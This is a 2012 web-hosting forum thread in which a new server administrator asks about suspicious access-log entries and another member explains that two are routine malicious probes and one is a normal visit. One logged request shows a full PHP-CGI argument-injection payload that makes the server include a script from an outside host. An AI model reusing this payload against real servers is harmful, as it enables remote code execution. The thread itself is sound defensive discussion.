Linode Forum
Linode Community Forums 		 FAQFAQ    SearchSearch    MembersMembers      Register Register 
 LoginLogin [ Anonymous ] 
Post new topic  Reply to topic

Board index » Linux Community Forums » General Discussion
  Previous topic | Next topic 
Author Message
johnnyg
 Post subject: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 5:27 pm 
Offline
Newbie

Joined: Tue Dec 18, 2012 5:17 pm
Posts: 3
Hi all,

I've discovered some suspicious traffic that I'd like to ask about:


Code:
A. 91.205.189.15 - - [17/Dec/2012:10:39:52 -0500] "GET /user/soapCaller.bs HTTP/1.1" 301 504 "-" "Morfeus Fucking Scanner"


Code:
B. 213.26.162.68 - - [17/Dec/2012:03:59:55 -0500] "GET /index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+-dauto_prepend_file=http://qualityhost.in/a.txt


Code:
C. 65.111.177.188 - - [18/Dec/2012:02:15:15 -0500] "GET / HTTP/1.1" 301 471 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"


1. My main concern is why the B turned up in access.log rather than error.log? Does that means it was successful?
Based on what I read across the forum, this is an injection attack or checking for an open proxy, correct?

2. How can I check if something like this was successful?

3. With Fail2Ban installed, is there a way to craft a RegExp to block such future requests?

4. URL C, It doesn't look like it got anything, is this a normal request or something to protect against?

Thanks for any advice you may have.
Top
   
Reply with quote  
Guspaz
 Post subject: Re: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 6:13 pm 
Offline
Senior Member
User avatar

Joined: Tue May 26, 2009 3:29 pm
Posts: 1691
Location: Montreal, QC
This sort of thing (A and B) is common and normal, there's no need to take any specific action (and fail2ban isn't useful for this sort of thing unless they're hammering you). B probably didn't return any error because it's probably a valid request with invalid parameters; you probably do have /index.php, and your script is probably just ignoring the pareameters.

For C, that looks like a completely normal web request. Somebody using Chrome tried to access your website. Why would you want to block it?
Top
   
Reply with quote  
johnnyg
 Post subject: Re: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 6:25 pm 
Offline
Newbie

Joined: Tue Dec 18, 2012 5:17 pm
Posts: 3
Thanks for the reply Guspaz!

Yes, I do have index.php.

Well, I probably should have stated that I'm new to managing this aspect of a server, so I just wanted to check. You've definitely put me at ease though. In regards to C, I had figured that legitimate requests would have had more than '/' - something along the lines of B.
Top
   
Reply with quote  
Guspaz
 Post subject: Re: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 7:07 pm 
Offline
Senior Member
User avatar

Joined: Tue May 26, 2009 3:29 pm
Posts: 1691
Location: Montreal, QC
If they're accessing your site for the first time in a session, like at "http://mydomain.com", they don't have any extra parameters to pass.

A and B are definitely malicious traffic, but if you keep up to date with security updates, you should be fine.
Top
   
Reply with quote  
johnnyg
 Post subject: Re: Suspicious Traffic
PostPosted: Tue Dec 18, 2012 7:42 pm 
Offline
Newbie

Joined: Tue Dec 18, 2012 5:17 pm
Posts: 3
I update pretty well, so I guess that's covered.
Top
   
Reply with quote  
Display posts from previous:  Sort by  
Post new topic  Reply to topic

Board index » Linux Community Forums » General Discussion


Who is online

Users browsing this forum: No registered users and 3 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  
RSS

Powered by phpBB® Forum Software © phpBB Group